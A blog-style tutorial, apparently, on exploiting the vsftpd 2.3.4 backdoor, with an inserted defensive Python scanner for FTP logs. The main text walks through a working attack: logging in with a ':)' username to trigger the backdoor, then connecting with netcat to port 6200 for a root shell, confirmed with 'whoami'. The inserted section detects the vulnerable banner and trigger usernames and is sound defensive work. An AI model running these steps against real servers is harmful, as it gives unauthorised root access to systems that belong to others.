Aside from having a very nice version number (2-3-4), vsftpd 2.3.4 contains a LOLz backdoor that can be exploited easily without using any sophisticated tools (that’s the point of a backdoor, after all).
What you need:
- A computer with internet connection
- An FTP client (most Linux and Windows systems ship with one by default)
- Netcat (or something similar, netcat is available for both Linux and Windows)
- Feeling comfortable with terminal and command line
I’ll use a Linux machine, but this should work on Windows with cmd or PowerShell as well.
Step 1: Connect to the computer running vsftpd 2.3.4 with your FTP client
Open your terminal and type the command “ftp <ip address of the target>”
Example: ftp 192.168.123.111
Step 2: Exploit it
The target will ask you for a user name. Don’t worry, just type in some random text ending with a smiley face. The smiley face is important: you must include it in your fake username or it won’t work.
Like this: asdasdasda:)
Then it will ask you for a password; just type in some random text.
Like this: dasdasdasd
The terminal will hang because the target has spawned a listener on its port 6200, so don’t worry. Just leave it like that and don’t close the terminal. All you need to do now is connect to port 6200 and get your root shell.
Step 3: Connect to port 6200
In this article I’ll connect to port 6200 using netcat for simplicity’s sake, but feel free to use whatever you like and are comfortable with.
Open another terminal (again, don’t close the terminal above) and type in this command: nc <target’s ip> 6200
Example: nc 192.168.123.111 6200
You will see that it returns … nothing. Yes, nothing: the terminal is completely empty. But when you type the command “whoami”, it will return “root”.
Congrats, you have successfully exploited vsftpd 2.3.4 and got root access (the all-powerful user of a Linux machine).
Windows also has “whoami” command, so you should be fine even if you’re on Windows.
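From the defender’s side, the two things worth watching for are exactly the two things the steps above rely on: a server that announces itself as vsFTPd 2.3.4, and a USER command whose argument contains the “:)” trigger. The following is an added example, not code from the original post, that scans constructed FTP control-channel log lines (a “C>”/“S>” direction prefix is assumed; real sensors use their own format) and rates each hit. A smiley in a username is only meaningful on the backdoored build, so the scanner grades it high only when the session banner matched 2.3.4, and low otherwise.

```python
import re
from typing import Dict, List

# Constructed sample of an FTP control channel as a proxy or sensor might log it
# (not taken from the original post). "S>" is server, "C>" is client.
SAMPLE_LINES = [
    "S> 220 (vsFTPd 2.3.4)",
    "C> USER alice",
    "C> PASS hunter2",
    "S> 230 Login successful.",
    "S> 220 (vsFTPd 2.3.4)",
    "C> USER asdasdasda:)",
    "C> PASS dasdasdasd",
    "S> 220 (vsFTPd 3.0.3)",
    "C> USER bob:)",
]

# vsftpd prints its version in the 220 greeting; 2.3.4 is the backdoored release.
VULN_BANNER = re.compile(r"vsFTPd 2\.3\.4\b")
BANNER_LINE = re.compile(r"^S> 220 \((.*)\)")
USER_CMD = re.compile(r"^C> USER (.*)$")


def is_backdoor_trigger(username: str) -> bool:
    """The backdoored build reacts to ':)' anywhere in the USER argument."""
    return ":)" in username


def scan_ftp_log(lines: List[str]) -> List[Dict[str, object]]:
    """Walk the log in order, remembering the last server banner seen so a
    trigger username can be graded against the version it was sent to."""
    findings: List[Dict[str, object]] = []
    current_banner = None
    for number, line in enumerate(lines, start=1):
        banner = BANNER_LINE.match(line)
        if banner:
            current_banner = banner.group(1)
            if VULN_BANNER.search(current_banner):
                findings.append({
                    "line": number,
                    "severity": "medium",
                    "reason": "server advertises vsFTPd 2.3.4",
                })
            continue
        user = USER_CMD.match(line)
        if user and is_backdoor_trigger(user.group(1)):
            on_vulnerable = bool(current_banner and VULN_BANNER.search(current_banner))
            findings.append({
                "line": number,
                "severity": "high" if on_vulnerable else "low",
                "reason": f"smiley in USER argument {user.group(1)!r}",
            })
    return findings


if __name__ == "__main__":
    for finding in scan_ftp_log(SAMPLE_LINES):
        print(f"line {finding['line']}: [{finding['severity']}] {finding['reason']}")
```

Run against the sample, the scanner flags both 2.3.4 greetings, grades the “asdasdasda:)” login high because it followed a 2.3.4 banner, and grades “bob:)” low because that session was talking to 3.0.3. On the host itself, a process listening on TCP 6200 alongside the FTP daemon is the other indicator the steps above produce; the fix is simply not to run the backdoored build.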
At first, I thought that I should write this into a python script or something to automate the process. But since it is so simple, I really can’t bring myself to do that. Also, there is a module in the Metasploit framework that can do everything for you.
**Tested on Linux and Windows (with PowerShell and Netcat)